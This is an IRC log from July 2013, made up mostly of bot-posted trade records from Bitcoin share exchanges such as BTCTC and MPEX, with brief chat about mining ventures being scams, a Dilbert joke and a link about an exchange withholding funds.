28 06:39:03 how long does manual processing on btctc usually take? Jul 28 06:40:04 [BTCTC] [ACTIVEMINING] 1 @ 0.006934 BTC [-] Jul 28 06:41:07 [BTCTC] [ACTIVEMINING] 85 @ 0.006932 = 0.5892 BTC [-] Jul 28 06:41:38 [BTCTC] [ACTIVEMINING] 33 @ 0.00685 = 0.2261 BTC [-] Jul 28 06:43:14 [BTCTC] [ACTIVEMINING] 3 @ 0.006839 = 0.0205 BTC [-] Jul 28 06:43:28 [BTCTC] [ACTIVEMINING] 22 @ 0.006839 = 0.1505 BTC [-] Jul 28 06:43:30 [BTCTC] [ACTIVEMINING] 184 @ 0.00684 = 1.2586 BTC [+] Jul 28 06:46:54 mjoiii go aherad Jul 28 06:47:40 ah. well... the thought process was basically, "ok this thing rocks. what does it lack?" Jul 28 06:47:54 it was quickly apparent it lacks some financial expertise. Jul 28 06:50:23 [BTCTC] [ACTIVEMINING] 480 @ 0.006944 = 3.3331 BTC [+] Jul 28 06:50:25 [BTCTC] [ACTIVEMINING] 751 @ 0.006944 = 5.2149 BTC [+] Jul 28 06:50:26 [BTCTC] [ACTIVEMINING] 50 @ 0.006944 = 0.3472 BTC [+] Jul 28 06:50:28 [BTCTC] [ACTIVEMINING] 300 @ 0.006944 = 2.0832 BTC [+] Jul 28 06:50:34 [BTCTC] [ACTIVEMINING] 71 @ 0.006944 = 0.493 BTC [+] Jul 28 06:50:38 [BTCTC] [ACTIVEMINING] 300 @ 0.006944 = 2.0832 BTC [+] Jul 28 06:51:26 [BTCTC] [ACTIVEMINING] 1 @ 0.006945 BTC [+] Jul 28 06:51:53 [BTCTC] [ACTIVEMINING] 300 @ 0.006944 = 2.0832 BTC [-] Jul 28 06:52:27 [BTCTC] [ACTIVEMINING] 700 @ 0.006944 = 4.8608 BTC [-] Jul 28 06:52:37 [BTCTC] [ACTIVEMINING] 3 @ 0.006944 = 0.0208 BTC [-] Jul 28 06:52:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006944 = 0.1736 BTC [-] Jul 28 06:54:21 [BTCTC] [ACTIVEMINING] 1000 @ 0.0069 = 6.9 BTC [-] Jul 28 06:54:40 [BTCTC] [ACTIVEMINING] 1 @ 0.0069 BTC [-] Jul 28 06:55:28 [BTCTC] [ACTIVEMINING] 25 @ 0.006701 = 0.1675 BTC [-] Jul 28 06:55:29 [BTCTC] [ACTIVEMINING] 975 @ 0.0067 = 6.5325 BTC [-] Jul 28 06:56:29 [BTCTC] [ACTIVEMINING] 25 @ 0.006701 = 0.1675 BTC [+] Jul 28 06:56:31 [BTCTC] [ACTIVEMINING] 25 @ 0.0067 = 0.1675 BTC [-] Jul 28 06:56:33 [BTCTC] [ACTIVEMINING] 20 @ 0.0067 = 0.134 BTC [-] Jul 28 06:56:47 [BTCTC] [ACTIVEMINING] 25 @ 0.006899 = 0.1725 BTC [+] Jul 28 06:57:04 [BTCTC] [ACTIVEMINING] 25 @ 0.006703 = 0.1676 BTC [-] Jul 28 06:57:08 [BTCTC] [ACTIVEMINING] 17 @ 0.006702 = 0.1139 BTC [-] Jul 28 06:57:12 [BTCTC] [ACTIVEMINING] 20 @ 0.006702 = 0.134 BTC [-] Jul 28 06:57:14 [BTCTC] [ACTIVEMINING] 5 @ 0.0067 = 0.0335 BTC [-] Jul 28 06:57:37 [BTCTC] [ACTIVEMINING] 1 @ 0.0067 BTC [-] Jul 28 06:59:02 [BTCTC] [ACTIVEMINING] 400 @ 0.006661 = 2.6644 BTC [-] Jul 28 07:01:01 [BTCTC] [ACTIVEMINING] 300 @ 0.006672 = 2.0016 BTC [+] Jul 28 07:01:34 [BTCTC] [ACTIVEMINING] 25 @ 0.006678 = 0.167 BTC [+] Jul 28 07:01:36 [BTCTC] [ACTIVEMINING] 40 @ 0.006677 = 0.2671 BTC [-] Jul 28 07:01:47 [BTCTC] [ACTIVEMINING] 1 @ 0.006887 BTC [+] Jul 28 07:01:50 [BTCTC] [ACTIVEMINING] 24 @ 0.006887 = 0.1653 BTC [+] Jul 28 07:02:02 [BTCTC] [ACTIVEMINING] 126 @ 0.006888 = 0.8679 BTC [+] Jul 28 07:02:59 [BTCTC] [ACTIVEMINING] 85 @ 0.00678 = 0.5763 BTC [-] Jul 28 07:03:16 [BTCTC] [ACTIVEMINING] 1 @ 0.00678 BTC [-] Jul 28 07:03:21 [BTCTC] [ACTIVEMINING] 1000 @ 0.00677 = 6.77 BTC [-] Jul 28 07:03:40 [BTCTC] [ACTIVEMINING] 2 @ 0.006779 = 0.0136 BTC [+] Jul 28 07:03:49 [BTCTC] [ACTIVEMINING] 1 @ 0.00678 BTC [+] Jul 28 07:03:53 [BTCTC] [ACTIVEMINING] 10 @ 0.00678 = 0.0678 BTC [+] Jul 28 07:06:48 [BTCTC] [ACTIVEMINING] 25 @ 0.006898 = 0.1725 BTC [+] Jul 28 07:06:50 [BTCTC] [ACTIVEMINING] 125 @ 0.006899 = 0.8624 BTC [+] Jul 28 07:07:38 [BTCTC] [ACTIVEMINING] 1 @ 0.006898 BTC [-] Jul 28 07:08:38 [BTCTC] [ACTIVEMINING] 25 @ 0.006896 = 0.1724 BTC [-] Jul 28 07:08:40 [BTCTC] [ACTIVEMINING] 10 @ 0.006897 = 0.069 BTC [+] Jul 28 07:09:24 [BTCTC] [ACTIVEMINING] 7 @ 0.006895 = 0.0483 BTC [-] Jul 28 07:11:35 [BTCTC] [ACTIVEMINING] 25 @ 0.006787 = 0.1697 BTC [-] Jul 28 07:11:39 [BTCTC] [ACTIVEMINING] 50 @ 0.006786 = 0.3393 BTC [-] Jul 28 07:11:41 [BTCTC] [ACTIVEMINING] 25 @ 0.006784 = 0.1696 BTC [-] Jul 28 07:12:21 [BTCTC] [ACTIVEMINING] 1 @ 0.006893 BTC [+] Jul 28 07:12:36 [BTCTC] [ACTIVEMINING] 12 @ 0.006786 = 0.0814 BTC [-] Jul 28 07:12:37 [BTCTC] [ACTIVEMINING] 18 @ 0.006785 = 0.1221 BTC [-] Jul 28 07:12:59 [BTCTC] [ACTIVEMINING] 14 @ 0.006892 = 0.0965 BTC [+] Jul 28 07:13:25 [BTCTC] [ACTIVEMINING] 2 @ 0.006786 = 0.0136 BTC [-] Jul 28 07:19:05 [BTCTC] [BASIC-MINING] 2 @ 0.51 = 1.02 BTC [-] Jul 28 07:19:06 [BTCTC] [ACTIVEMINING] 1 @ 0.006695 BTC [-] Jul 28 07:19:21 [BTCTC] [ACTIVEMINING] 25 @ 0.006694 = 0.1674 BTC [-] Jul 28 07:19:28 [BTCTC] [ACTIVEMINING] 1 @ 0.006693 BTC [-] Jul 28 07:19:46 [BTCTC] [COGNITIVE] 1 @ 0.622 BTC [-] Jul 28 07:20:06 [BTCTC] [ACTIVEMINING] 25 @ 0.006694 = 0.1674 BTC [+] Jul 28 07:20:08 [BTCTC] [COGNITIVE] 1 @ 0.622 BTC [-] Jul 28 07:20:15 [BTCTC] [ACTIVEMINING] 18 @ 0.006696 = 0.1205 BTC [+] Jul 28 07:20:17 [BTCTC] [ACTIVEMINING] 10 @ 0.006785 = 0.0679 BTC [+] Jul 28 07:20:20 [BTCTC] [ACTIVEMINING] 31 @ 0.006893 = 0.2137 BTC [+] **** BEGIN LOGGING AT Sun Jul 28 07:25:56 2013 Jul 28 07:27:17 [BTCTC] [ACTIVEMINING] 1 @ 0.006889 BTC [-] Jul 28 07:28:46 [BTCTC] [ACTIVEMINING] 25 @ 0.006889 = 0.1722 BTC [-] Jul 28 07:28:48 [BTCTC] [ACTIVEMINING] 75 @ 0.00689 = 0.5168 BTC [+] Jul 28 07:31:48 [BTCTC] [ACTIVEMINING] 425 @ 0.00689 = 2.9283 BTC [+] Jul 28 07:34:01 [BTCTC] [BASIC-MINING] 7 @ 0.5494 = 3.8458 BTC [+] Jul 28 07:36:28 [BTCTC] [ACTIVEMINING] 5 @ 0.00689 = 0.0345 BTC [+] Jul 28 07:42:22 [BTCTC] [ACTIVEMINING] 25 @ 0.006618 = 0.1655 BTC [-] Jul 28 07:42:24 [BTCTC] [ACTIVEMINING] 50 @ 0.006617 = 0.3309 BTC [-] Jul 28 07:42:26 [BTCTC] [ACTIVEMINING] 1 @ 0.006617 BTC [-] Jul 28 07:42:27 [BTCTC] [ACTIVEMINING] 38 @ 0.006615 = 0.2514 BTC [-] Jul 28 07:42:29 [BTCTC] [ACTIVEMINING] 162 @ 0.006601 = 1.0694 BTC [-] Jul 28 07:42:30 [BTCTC] [ACTIVEMINING] 325 @ 0.0066 = 2.145 BTC [-] Jul 28 07:42:32 [BTCTC] [ACTIVEMINING] 132 @ 0.006559 = 0.8658 BTC [-] Jul 28 07:42:33 [BTCTC] [ACTIVEMINING] 249 @ 0.006558 = 1.6329 BTC [-] Jul 28 07:42:34 [BTCTC] [ACTIVEMINING] 15 @ 0.006558 = 0.0984 BTC [-] Jul 28 07:42:36 [BTCTC] [ACTIVEMINING] 122 @ 0.006556 = 0.7998 BTC [-] Jul 28 07:42:37 [BTCTC] [ACTIVEMINING] 17 @ 0.006555 = 0.1114 BTC [-] Jul 28 07:42:39 [BTCTC] [ACTIVEMINING] 228 @ 0.00655 = 1.4934 BTC [-] Jul 28 07:42:40 [BTCTC] [ACTIVEMINING] 500 @ 0.006501 = 3.2505 BTC [-] Jul 28 07:42:42 [BTCTC] [ACTIVEMINING] 136 @ 0.0065 = 0.884 BTC [-] Jul 28 07:47:39 [BTCTC] [ACTIVEMINING] 25 @ 0.006883 = 0.1721 BTC [+] Jul 28 07:47:41 [BTCTC] [ACTIVEMINING] 50 @ 0.006884 = 0.3442 BTC [+] Jul 28 07:48:13 [BTCTC] [ACTIVEMINING] 121 @ 0.006886 = 0.8332 BTC [+] Jul 28 07:48:15 [BTCTC] [ACTIVEMINING] 833 @ 0.006899 = 5.7469 BTC [+] Jul 28 07:49:23 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Jul 28 07:54:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003425 BTC [+] Jul 28 07:54:50 [MPEX] [S.MPOE] [PAID] 626.76570088 BTC to 500`000`000 shares, 125 satoshi per share Jul 28 07:55:45 [BTCTC] [ASICMINER-PT] 1 @ 4.555 BTC [-] Jul 28 07:55:48 [BTCTC] [ASICMINER-PT] 2 @ 4.551 = 9.102 BTC [-] Jul 28 07:55:49 [BTCTC] [ASICMINER-PT] 2 @ 4.55 = 9.1 BTC [-] Jul 28 07:56:02 [BTCTC] [ASICMINER-PT] 1 @ 4.55 BTC [-] Jul 28 07:56:04 [BTCTC] [ASICMINER-PT] 1 @ 4.55 BTC [-] Jul 28 07:58:22 [BTCTC] [ACTIVEMINING] 25 @ 0.006607 = 0.1652 BTC [-] Jul 28 07:58:25 [BTCTC] [ACTIVEMINING] 770 @ 0.006606 = 5.0866 BTC [-] Jul 28 07:58:37 [BTCTC] [ACTIVEMINING] 1 @ 0.006887 BTC [+] Jul 28 08:01:30 [BTCTC] [KENILWORTH] 1 @ 0.001799 BTC [+] Jul 28 08:02:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [-] Jul 28 08:03:38 ! Jul 28 08:03:41 [BTCTC] [DMS.PURCHASE] 5 @ 0.0337 = 0.1685 BTC [-] Jul 28 08:03:46 first time i've seen a kenilworth buy Jul 28 08:04:51 is this the rl mining venture ? Jul 28 08:05:17 "real" is the question Jul 28 08:05:28 i bet half a B it's a scam Jul 28 08:05:28 :p Jul 28 08:05:36 well here's the thing : most mining ventures are scams anyway Jul 28 08:05:48 they pretty much have a special section i nthe pink sheets Jul 28 08:05:56 scam until they win the lottery lol Jul 28 08:08:15 [BTCTC] [ACTIVEMINING] 20 @ 0.006884 = 0.1377 BTC [-] Jul 28 08:09:23 something like that. Jul 28 08:09:51 most governments with resouirces tolerate it because well... it's damned hard to maintain presence in far flung places where mining goes on Jul 28 08:10:32 like somewhere in the ass crack of australia :P Jul 28 08:11:24 yes or wilderness of canada etc Jul 28 08:12:11 rather than spend more taxpayer funds to provide freebies for the sort of people willin to live in the sticks out there, Jul 28 08:12:17 cheaper to just not spend taxpayer funds on hassling them Jul 28 08:13:23 i shouldn't h8, i hope they hit paydirt, i'm virtually certain they wont Jul 28 08:19:35 sounds like that tv show gold rush Jul 28 08:19:47 goldrush:kennilworth Jul 28 08:21:18 [BTCTC] [ACTIVEMINING] 25 @ 0.006629 = 0.1657 BTC [-] Jul 28 08:21:20 [BTCTC] [ACTIVEMINING] 50 @ 0.006628 = 0.3314 BTC [-] Jul 28 08:21:31 [BTCTC] [ACTIVEMINING] 112 @ 0.006628 = 0.7423 BTC [-] Jul 28 08:21:33 [BTCTC] [ACTIVEMINING] 200 @ 0.006625 = 1.325 BTC [-] Jul 28 08:21:37 [BTCTC] [ACTIVEMINING] 113 @ 0.0066 = 0.7458 BTC [-] Jul 28 08:21:54 [BTCTC] [ACTIVEMINING] 23 @ 0.00688 = 0.1582 BTC [+] Jul 28 08:22:03 [BTCTC] [ACTIVEMINING] 25 @ 0.006629 = 0.1657 BTC [-] Jul 28 08:22:05 [BTCTC] [ACTIVEMINING] 559 @ 0.006628 = 3.7051 BTC [-] Jul 28 08:29:15 [BTCTC] [ACTIVEMINING] 25 @ 0.006641 = 0.166 BTC [+] Jul 28 08:29:17 [BTCTC] [ACTIVEMINING] 50 @ 0.00664 = 0.332 BTC [-] Jul 28 08:29:17 [BTCTC] [ACTIVEMINING] 19 @ 0.006638 = 0.1261 BTC [-] Jul 28 08:29:19 [BTCTC] [ACTIVEMINING] 72 @ 0.006638 = 0.4779 BTC [-] Jul 28 08:29:29 [BTCTC] [ACTIVEMINING] 1 @ 0.006636 BTC [-] Jul 28 08:29:31 [BTCTC] [ACTIVEMINING] 48 @ 0.006629 = 0.3182 BTC [-] Jul 28 08:29:32 [BTCTC] [ACTIVEMINING] 192 @ 0.006628 = 1.2726 BTC [-] Jul 28 08:29:34 [BTCTC] [ACTIVEMINING] 188 @ 0.006551 = 1.2316 BTC [-] Jul 28 08:29:35 [BTCTC] [ACTIVEMINING] 1100 @ 0.00655 = 7.205 BTC [-] Jul 28 08:29:37 [BTCTC] [ACTIVEMINING] 633 @ 0.006305 = 3.9911 BTC [-] Jul 28 08:29:38 [BTCTC] [ACTIVEMINING] 1072 @ 0.0063 = 6.7536 BTC [-] Jul 28 08:32:19 [MPEX] [S.MPOE] 4350 @ 0.00080193 = 3.4884 BTC [+] Jul 28 08:32:21 [MPEX] [S.MPOE] 1350 @ 0.00080196 = 1.0826 BTC [+] Jul 28 08:39:42 [BTCTC] [ACTIVEMINING] 25 @ 0.006113 = 0.1528 BTC [-] Jul 28 08:39:44 [BTCTC] [ACTIVEMINING] 50 @ 0.006112 = 0.3056 BTC [-] Jul 28 08:39:45 [BTCTC] [ACTIVEMINING] 25 @ 0.0061 = 0.1525 BTC [-] Jul 28 08:43:29 [BTCTC] [ACTIVEMINING] 633 @ 0.006388 = 4.0436 BTC [+] Jul 28 08:43:29 [BTCTC] [ACTIVEMINING] 50 @ 0.006389 = 0.3195 BTC [+] Jul 28 08:43:31 [BTCTC] [ACTIVEMINING] 139 @ 0.006395 = 0.8889 BTC [+] Jul 28 08:47:02 scott adams is in altcoin bsnss too: http://www.youtube.com/watch?v=fz2i1OcwXf Jul 28 08:47:15 oh sry i meant http://www.dilbert.com/2013-07-23/ Jul 28 08:47:24 ^ does not exist Jul 28 08:47:27 oh Jul 28 08:54:25 dilbert's unending quest to cling to relevance Jul 28 08:54:31 going on what, 30 years by now ? Jul 28 08:54:39 [BTCTC] [ASICMINER-PT] 1 @ 4.532 BTC [-] Jul 28 08:54:42 [BTCTC] [ASICMINER-PT] 1 @ 4.53 BTC [-] Jul 28 08:54:44 [BTCTC] [ASICMINER-PT] 1 @ 4.53 BTC [-] Jul 28 08:54:46 [BTCTC] [ASICMINER-PT] 1 @ 4.52 BTC [-] Jul 28 08:54:50 [BTCTC] [ASICMINER-PT] 5 @ 4.506 = 22.53 BTC [-] Jul 28 08:54:53 [BTCTC] [ASICMINER-PT] 1 @ 4.503 BTC [-] Jul 28 08:54:56 [BTCTC] [ASICMINER-PT] 20 @ 4.501 = 90.02 BTC [-] Jul 28 08:54:58 [BTCTC] [ASICMINER-PT] 1 @ 4.501 BTC [-] Jul 28 08:55:01 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 28 08:55:05 [BTCTC] [ASICMINER-PT] 5 @ 4.5 = 22.5 BTC [-] Jul 28 08:58:41 [BTCTC] [COGNITIVE] 5 @ 0.611 = 3.055 BTC [-] Jul 28 09:00:48 [BTCTC] [BITVPS] 1 @ 0.001985 BTC [-] Jul 28 09:06:40 [BTCTC] [ACTIVEMINING] 7 @ 0.006166 = 0.0432 BTC [-] Jul 28 09:07:56 [MPEX] [S.MPOE] 3642 @ 0.00080101 = 2.9173 BTC [-] Jul 28 09:07:58 [MPEX] [S.MPOE] 1896 @ 0.00079957 = 1.516 BTC [-] Jul 28 09:08:00 [MPEX] [S.MPOE] 462 @ 0.00079887 = 0.3691 BTC [-] Jul 28 09:08:39 [BTCTC] [COG.F] 1 @ 9 BTC [+] Jul 28 09:09:18 [BTCTC] [ACTIVEMINING] 1 @ 0.006399 BTC [+] Jul 28 09:22:25 [BTCTC] [ACTIVEMINING] 125 @ 0.006103 = 0.7629 BTC [-] Jul 28 09:22:27 [BTCTC] [ACTIVEMINING] 475 @ 0.0061 = 2.8975 BTC [-] Jul 28 09:22:28 [BTCTC] [ACTIVEMINING] 24 @ 0.006002 = 0.144 BTC [-] Jul 28 09:22:30 [BTCT:BITVPS] 1D: 0.0017 / 0.00175 / 0.001989 (292 shares, 0.5 BTC), 7D: 0.00165 / 0.0018 / 0.002472 (17730 shares, 31.9 BTC), 30D: 0.00089 / 0.0017 / 0.0035 (68869 shares, 117.3 BTC) Jul 28 09:22:30 [BTCTC] [ACTIVEMINING] 8 @ 0.006001 = 0.048 BTC [-] Jul 28 09:22:31 [BTCTC] [ACTIVEMINING] 499 @ 0.006 = 2.994 BTC [-] Jul 28 09:22:33 [BTCTC] [ACTIVEMINING] 2000 @ 0.006 = 12 BTC [-] Jul 28 09:29:12 [BTCTC] [ACTIVEMINING] 1 @ 0.005923 BTC [-] Jul 28 09:29:47 [BTCTC] [ACTIVEMINING] 25 @ 0.005923 = 0.1481 BTC [-] Jul 28 09:29:49 [BTCTC] [ACTIVEMINING] 1 @ 0.005922 BTC [-] Jul 28 09:29:50 [BTCTC] [ACTIVEMINING] 404 @ 0.00592 = 2.3917 BTC [-] Jul 28 09:31:00 [BTCTC] [ACTIVEMINING] 250 @ 0.00596 = 1.49 BTC [+] Jul 28 09:31:51 [BTCTC] [ACTIVEMINING] 1 @ 0.00596 BTC [+] Jul 28 09:32:59 [BTCTC] [ACTIVEMINING] 6 @ 0.005959 = 0.0358 BTC [-] Jul 28 09:33:13 [HAVELOCK] [SDSTM] 5 @ 0.0096 = 0.048 BTC [-] Jul 28 09:33:29 [HAVELOCK] [SMG] 8 @ 0.0002561 = 0.002 BTC [+] Jul 28 09:33:45 [HAVELOCK] [SMG] 258 @ 0.000256 = 0.066 BTC [-] Jul 28 09:33:56 [BTCTC] [ACTIVEMINING] 477 @ 0.005959 = 2.8424 BTC [-] Jul 28 09:34:54 [BTCTC] [ACTIVEMINING] 55 @ 0.00596 = 0.3278 BTC [+] Jul 28 09:35:39 [BTCTC] [ACTIVEMINING] 75 @ 0.00596 = 0.447 BTC [+] Jul 28 09:35:43 [BTCTC] [ACTIVEMINING] 1 @ 0.00596 BTC [+] Jul 28 09:35:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.04537 BTC [+] Jul 28 09:36:50 [BTCTC] [ACTIVEMINING] 300 @ 0.005959 = 1.7877 BTC [-] Jul 28 09:36:52 [BTCTC] [ACTIVEMINING] 1634 @ 0.00596 = 9.7386 BTC [+] Jul 28 09:37:11 [BTCTC] [ACTIVEMINING] 160 @ 0.00596 = 0.9536 BTC [+] Jul 28 09:37:20 [BTCTC] [ACTIVEMINING] 9 @ 0.00596 = 0.0536 BTC [+] Jul 28 09:37:53 [BTCTC] [TAT.MINIGAME] 65 @ 0.000275 = 0.0179 BTC [+] Jul 28 09:39:15 [BTCTC] [ACTIVEMINING] 25 @ 0.006298 = 0.1575 BTC [+] Jul 28 09:40:27 [BTCTC] [ACTIVEMINING] 375 @ 0.006298 = 2.3618 BTC [+] Jul 28 09:46:49 [BTCTC] [ACTIVEMINING] 10 @ 0.00629 = 0.0629 BTC [-] Jul 28 09:53:07 [BTCTC] [CRYPTO-TRADE] 10 @ 0.198 = 1.98 BTC [-] Jul 28 09:54:41 [BTCTC] [TAT.MINIGAME] 10 @ 0.000275 = 0.0028 BTC [+] Jul 28 10:02:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.0451 = 0.451 BTC [-] Jul 28 10:02:35 [BTCTC] [TAT.ASICMINER] 11 @ 0.045 = 0.495 BTC [-] Jul 28 10:02:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 28 10:02:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.04495 = 0.0899 BTC [-] Jul 28 10:02:41 [BTCTC] [TAT.ASICMINER] 6 @ 0.04491 = 0.2695 BTC [-] Jul 28 10:02:43 [BTCTC] [TAT.ASICMINER] 28 @ 0.0449 = 1.2572 BTC [-] Jul 28 10:04:52 [BTCTC] [ACTIVEMINING] 25 @ 0.00628 = 0.157 BTC [-] Jul 28 10:05:22 [BTCTC] [ACTIVEMINING] 25 @ 0.00628 = 0.157 BTC [-] Jul 28 10:05:24 [BTCTC] [ACTIVEMINING] 25 @ 0.006281 = 0.157 BTC [+] Jul 28 10:05:26 [BTCTC] [ACTIVEMINING] 50 @ 0.006283 = 0.3142 BTC [+] Jul 28 10:05:28 [BTCTC] [ACTIVEMINING] 16 @ 0.006289 = 0.1006 BTC [+] Jul 28 10:05:29 [BTCTC] [ACTIVEMINING] 100 @ 0.00629 = 0.629 BTC [+] Jul 28 10:05:31 [BTCTC] [ACTIVEMINING] 12 @ 0.006299 = 0.0756 BTC [+] Jul 28 10:05:32 [BTCTC] [ACTIVEMINING] 75 @ 0.0063 = 0.4725 BTC [+] Jul 28 10:05:34 [BTCTC] [ACTIVEMINING] 12 @ 0.006396 = 0.0768 BTC [+] Jul 28 10:05:43 [BTCTC] [ACTIVEMINING] 75 @ 0.006397 = 0.4798 BTC [+] Jul 28 10:07:56 [BTCTC] [TAT.MINIGAME] 1 @ 0.000275 BTC [+] Jul 28 10:07:58 [BTCTC] [ACTIVEMINING] 1 @ 0.006478 BTC [+] Jul 28 10:09:23 [BTCTC] [KENILWORTH] 1 @ 0.001799 BTC [+] Jul 28 10:10:14 [BTCTC] [ACTIVEMINING] 9 @ 0.006301 = 0.0567 BTC [-] Jul 28 10:12:11 [BTCTC] [ACTIVEMINING] 1 @ 0.00641 BTC [+] Jul 28 10:12:42 [BTCTC] [ASICMINER-PT] 6 @ 4.58 = 27.48 BTC [+] Jul 28 10:12:44 [BTCTC] [ASICMINER-PT] 1 @ 4.581 BTC [+] Jul 28 10:12:48 [BTCTC] [ASICMINER-PT] 2 @ 4.583 = 9.166 BTC [+] Jul 28 10:14:37 [BTCTC] [ACTIVEMINING] 7 @ 0.006351 = 0.0445 BTC [-] Jul 28 10:14:54 [BTCTC] [ACTIVEMINING] 18 @ 0.006352 = 0.1143 BTC [+] Jul 28 10:15:28 [BTCTC] [ACTIVEMINING] 7 @ 0.00635 = 0.0445 BTC [-] Jul 28 10:17:38 [BTCTC] [ACTIVEMINING] 25 @ 0.006348 = 0.1587 BTC [-] Jul 28 10:17:40 [BTCTC] [ACTIVEMINING] 12 @ 0.006349 = 0.0762 BTC [+] Jul 28 10:17:41 [BTCTC] [ACTIVEMINING] 12 @ 0.006471 = 0.0777 BTC [+] Jul 28 10:17:42 [BTCTC] [ACTIVEMINING] 50 @ 0.006473 = 0.3237 BTC [+] Jul 28 10:19:20 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Jul 28 10:24:43 [BTCTC] [ACTIVEMINING] 1 @ 0.006025 BTC [-] Jul 28 10:25:10 [BTCTC] [ACTIVEMINING] 25 @ 0.006478 = 0.162 BTC [+] Jul 28 10:25:12 [BTCTC] [ACTIVEMINING] 24 @ 0.006479 = 0.1555 BTC [+] Jul 28 10:25:32 [BTCTC] [ACTIVEMINING] 23 @ 0.006479 = 0.149 BTC [+] Jul 28 10:25:52 [BTCTC] [ACTIVEMINING] 24 @ 0.00648 = 0.1555 BTC [+] Jul 28 10:25:54 [BTCTC] [ACTIVEMINING] 75 @ 0.00648 = 0.486 BTC [+] Jul 28 10:25:55 [BTCTC] [ACTIVEMINING] 37 @ 0.006824 = 0.2525 BTC [+] Jul 28 10:25:57 [BTCTC] [ACTIVEMINING] 75 @ 0.006825 = 0.5119 BTC [+] Jul 28 10:25:58 [BTCTC] [ACTIVEMINING] 57 @ 0.006869 = 0.3915 BTC [+] Jul 28 10:25:59 [BTCTC] [ACTIVEMINING] 114 @ 0.00687 = 0.7832 BTC [+] Jul 28 10:26:01 [BTCTC] [ACTIVEMINING] 6 @ 0.006896 = 0.0414 BTC [+] Jul 28 10:26:13 [BTCTC] [ACTIVEMINING] 27 @ 0.00648 = 0.175 BTC [-] Jul 28 10:26:32 [BTCTC] [BTC-GOLD] 1 @ 0.05399 BTC [+] Jul 28 10:27:03 [BTCTC] [ACTIVEMINING] 1 @ 0.006896 BTC [+] Jul 28 10:28:38 [BTCTC] [ACTIVEMINING] 25 @ 0.006656 = 0.1664 BTC [-] Jul 28 10:28:46 ;;later tell davout http://www.reddit.com/r/Bitcoin/comments/1j6y5h/bitcoincentralnet_is_not_returning_btc_wallet/ Jul 28 10:28:46 The operation succeeded. Jul 28 10:28:49 [BTCTC] [ACTIVEMINING] 16 @ 0.006657 = 0.1065 BTC [+] Jul 28 10:28:51 [BTCTC] [ACTIVEMINING] 8 @ 0.006655 = 0.0532 BTC [-] Jul 28 10:32:57 [HAVELOCK] [SMG] 100 @ 0.000269 = 0.0269 BTC [+] Jul 28 10:33:29 [BTCTC] [S.MPOE-PT] 200 @ 0.0009457 = 0.1891 BTC [+] Jul 28 10:34:09 [HAVELOCK] [SMG] 10 @ 0.00027 = 0.0027 BTC [+] Jul 28 10:36:22 [BTCTC] [RSM] 31 @ 0.0154 = 0.4774 BTC [-] Jul 28 10:38:56 [BTCTC] [ACTIVEMINING] 33 @ 0.006896 = 0.2276 BTC [+] Jul 28 10:41:22 [BTCTC] [ACTIVEMINING] 14 @ 0.006893 = 0.0965 BTC [-] Jul 28 10:41:30 [BTCTC] [ACTIVEMINING] 1 @ 0.006691 BTC [-] Jul 28 10:41:35 [BTCTC] [ACTIVEMINING] 17 @ 0.00669 = 0.1137 BTC [-] Jul 28 10:42:04 [BTCTC] [ACTIVEMINING] 25 @ 0.006689 = 0.1672 BTC [-] Jul 28 10:45:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006481 = 0.162 BTC [-] Jul 28 10:45:54 [BTCTC] [ACTIVEMINING] 2 @ 0.00648 = 0.013 BTC [-] Jul 28 10:46:24 [BTCTC] [ACTIVEMINING] 25 @ 0.006477 = 0.1619 BTC [-] Jul 28 10:48:49 [BTCTC] [ACTIVEMINING] 8 @ 0.006476 = 0.0518 BTC [-] Jul 28 10:48:51 [BTCTC] [ACTIVEMINING] 25 @ 0.006477 = 0.1619 BTC [+] Jul 28 10:48:52 [BTCTC] [ACTIVEMINING] 15 @ 0.006478 = 0.0972 BTC [+] Jul 28 10:49:15 [BTCTC] [ACTIVEMINING] 25 @ 0.006475 = 0.1619 BTC [-] Jul 28 10:49:17 [BTCTC] [ACTIVEMINING] 2 @ 0.006476 = 0.013 BTC [+] Jul 28 10:49:18 [BTCTC] [ACTIVEMINING] 8 @ 0.006478 = 0.0518 BTC [+] Jul 28 10:50:36 [BTCTC] [ACTIVEMINING] 9 @ 0.006479 = 0.0583 BTC [+] Jul 28 10:52:05 [BTCTC] [ACTIVEMINING] 5 @ 0.006478 = 0.0324 BTC [-] Jul 28 10:53:01 [BTCTC] [ACTIVEMINING] 25 @ 0.006634 = 0.1659 BTC [+] Jul 28 10:53:53 [BTCTC] [ACTIVEMINING] 25 @ 0.006634 = 0.1659 BTC [+] Jul 28 10:53:55 [BTCTC] [ACTIVEMINING] 16 @ 0.006633 = 0.1061 BTC [-] Jul 28 10:55:15 [BTCTC] [ACTIVEMINING] 25 @ 0.006481 = 0.162 BTC [-] Jul 28 10:55:16 [BTCTC] [ACTIVEMINING] 50 @ 0.00648 = 0.324 BTC [-] Jul 28 10:55:18 [BTCTC] [ACTIVEMINING] 37 @ 0.006478 = 0.2397 BTC [-] **** BEGIN LOGGING AT Sun Jul 28 11:18:56 2013 Jul 28 11:20:06 [BTCTC] [ACTIVEMINING] 50 @ 0.006325 = 0.3163 BTC [-] Jul 28 11:20:31 [BTCTC] [ACTIVEMINING] 38 @ 0.006327 = 0.2404 BTC [+] Jul 28 11:20:33 [BTCTC] [RSM] 25 @ 0.0155 = 0.3875 BTC [+] Jul 28 11:21:34 [BTCTC] [TAT.MINIGAME] 50 @ 0.000275 = 0.0138 BTC [+] Jul 28 11:22:21 [BTCTC] [TAT.MINIGAME] 120 @ 0.000275 = 0.033 BTC [+] Jul 28 11:23:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.04485 = 0.0897 BTC [-] Jul 28 11:23:50 [BTCTC] [TAT.ASICMINER] 13 @ 0.04485 = 0.5831 BTC [-] Jul 28 11:26:54 [BTCTC] [TAT.MINIGAME] 956 @ 0.000275 = 0.2629 BTC [+] Jul 28 11:26:56 [BTCTC] [TAT.MINIGAME] 44 @ 0.000275 = 